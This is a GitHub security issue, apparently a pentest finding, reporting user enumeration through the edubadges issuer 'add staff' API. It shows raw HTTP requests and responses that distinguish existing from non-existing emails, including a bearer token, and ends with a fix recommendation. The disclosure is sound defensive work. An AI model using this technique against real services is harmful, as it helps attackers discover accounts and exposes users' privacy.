Skip to content
This repository has been archived by the owner on Oct 21, 2022. It is now read-only.

User Enumeration using the issuer manage staff functionality #8

Open
sveeke opened this issue Jun 18, 2018 · 1 comment
Open

User Enumeration using the issuer manage staff functionality #8

sveeke opened this issue Jun 18, 2018 · 1 comment
Labels
bug-infoleak risk-low Security issues with a low impact
Milestone
Pilot 2018

Comments

@sveeke
Copy link
Contributor

sveeke commented Jun 18, 2018

When adding a new staff member to an issuer it responses allows to determine if an user exists or not.
@sveeke
Copy link
Contributor Author

sveeke commented Jun 18, 2018
edited
Loading

threatLevel="Low" type="Account Enumeration"

When adding a new staff member to an issuer it response allows to determine if a user exists or not.

image

Non-existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"[email protected]","role":"owner"}

HTTP/1.1 404 Not Found
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:48:53 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 76

"User not found. Email must be verified and correspond to an existing user."

Existing user:

POST /v1/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/issuers/efOVSBKyQzqMrY5IPaHSiQ/staff
Content-Length: 79
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"action":"add","email":"[email protected]","role":"owner"}

HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:49:10 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 149

{"user":{"first_name":"Stefan","last_name":"Pentest","email":"[email protected]","slug":"OhBbDf5TQ-mc1ARkS6gOwA"},"role":"owner"}

Impact:
Existing user accounts can be enumerated by guessing email addresses.

Recommendation:
Ensure the responses for existing and non-existing users match exactly so that attackers cannot differentiate.

@sveeke sveeke added this to the Pilot 2018 milestone Jun 18, 2018
@sveeke sveeke added risk-low Security issues with a low impact bug-infoleak labels Jun 18, 2018
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
bug-infoleak risk-low Security issues with a low impact
Projects
None yet
Milestone
Pilot 2018
Development

No branches or pull requests
1 participant
@sveeke